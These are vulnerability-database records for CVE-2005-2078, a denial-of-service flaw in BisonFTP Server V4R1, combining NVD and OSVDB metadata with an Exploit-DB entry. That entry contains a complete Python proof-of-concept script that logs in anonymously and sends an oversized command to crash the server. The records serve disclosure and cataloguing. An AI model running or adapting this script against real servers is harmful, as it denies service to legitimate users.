{"href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2078", "history": [], "references": ["http://www.securityfocus.com/bid/14079"], "lastseen": "2016-09-03T05:34:13", "bulletinFamily": "NVD", "title": "CVE-2005-2078", "cpe": ["cpe:/a:sofotex:bisonftp:v4r1"], "viewCount": 0, "id": "CVE-2005-2078", "hash": "69a572cff8f2e3afa878db976edb7310f6b565d48d1156543b92e305a123c268", "description": "BisonFTP Server V4R1 allows remote authenticated users to cause a denial of service via an invalid command with a long argument.", "edition": 1, "assessment": {"name": "", "href": "", "system": ""}, "cvelist": ["CVE-2005-2078"], "scanner": [], "modified": "2008-09-05T16:50:49", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "objectVersion": "1.2", "reporter": "NVD", "type": "cve", "published": "2005-06-29T00:00:00", "enchantments": {"score": {"value": 5.0, "vector": "NONE", "modified": "2016-09-03T05:34:13"}, "dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:25911"]}, {"type": "osvdb", "idList": ["OSVDB:17730"]}], "modified": "2016-09-03T05:34:13"}, "vulnersScore": 5.0}}

{"exploitdb": [{"lastseen": "2016-02-03T02:26:21", "bulletinFamily": "exploit", "description": "BisonFTP V4R1 Remote Denial Of Service Vulnerability. CVE-2005-2078. Dos exploit for windows platform", "modified": "2005-06-28T00:00:00", "published": "2005-06-28T00:00:00", "id": "EDB-ID:25911", "href": "https://www.exploit-db.com/exploits/25911/", "type": "exploitdb", "title": "BisonFTP 4R1 - Remote Denial of Service Vulnerability", "sourceData": "source: http://www.securityfocus.com/bid/14079/info\r\n\r\nBisonFTP is prone to a remote denial-of-service vulnerability. A remote attacker may exploit this issue to deny service for legitimate users.\r\n\r\nReports indicate that the issue may be exploited only after successful authentication. \r\n\r\n#!/usr/bin/python\r\n#\r\n# Vulnerability: Denial Of Service\r\n# Discovered on: June 26, 2005 by fRoGGz - SecuBox Labs\r\n# When an invalid buffer size is sent to BisonFTPD -> DoS (100% CPU usage or crash)\r\n# NB: Sorry for Python purists, it's the first time that i use it ;)\r\n\r\nimport socket\r\nimport time\r\n\r\nn = 1\r\nt = 98192 #Try others, it's funny.\r\np = 21 # Set your port here.\r\nip = \"192.168.0.1\" # Set ip here.\r\nboom = \"PoC \"+'\\x41'*t\r\n\r\nprint \"\\n\\nVulnerable product: BisonFTP Server V4R1\"\r\nprint \"Denial of Service vulnerability\"\r\nprint \"---------------------------------------------\"\r\nprint \"Discovered & coded by fRoGGz - SecuBox Labs\\n\"\r\n\r\ntry:\r\n\r\n s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\r\n connect=s.connect((ip,p))\r\n\r\n d=s.recv(1024)\r\n\r\n print \"[+] \" +d\r\n\r\n print \"[+] Utilisateur.\"\r\n\r\n time.sleep(1)\r\n\r\n s.send('USER Anonymous\\r\\n')\r\n\r\n s.recv(512)\r\n\r\n print \"[+] Mot de passe.\"\r\n\r\n time.sleep(1)\r\n\r\n s.send('PASS Anonymous\\r\\n')\r\n\r\n s.recv(512)\r\n\r\n print \"[+] Envoi malicieux.\\n\\nDoS termine !\\n\"\r\n\r\n time.sleep(1)\r\n\r\n s.send(boom+'r\\n\\n')\r\n\r\n\r\nexcept:\r\n\r\n print \"[+] Machine indisponible, verifiez le port ou l'ip.\"\r\n", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/25911/"}], "osvdb": [{"lastseen": "2017-04-28T13:20:14", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nVendor URL: http://www.sofotex.com/BisonFTP-Server-download_L1880.html\n[CVE-2005-2078](https://vulners.com/cve/CVE-2005-2078)\nBugtraq ID: 14079\n", "modified": "2005-06-29T00:00:00", "published": "2005-06-29T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:17730", "id": "OSVDB:17730", "title": "SofoTex BisonFTP Command Line Overflow", "type": "osvdb", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}]}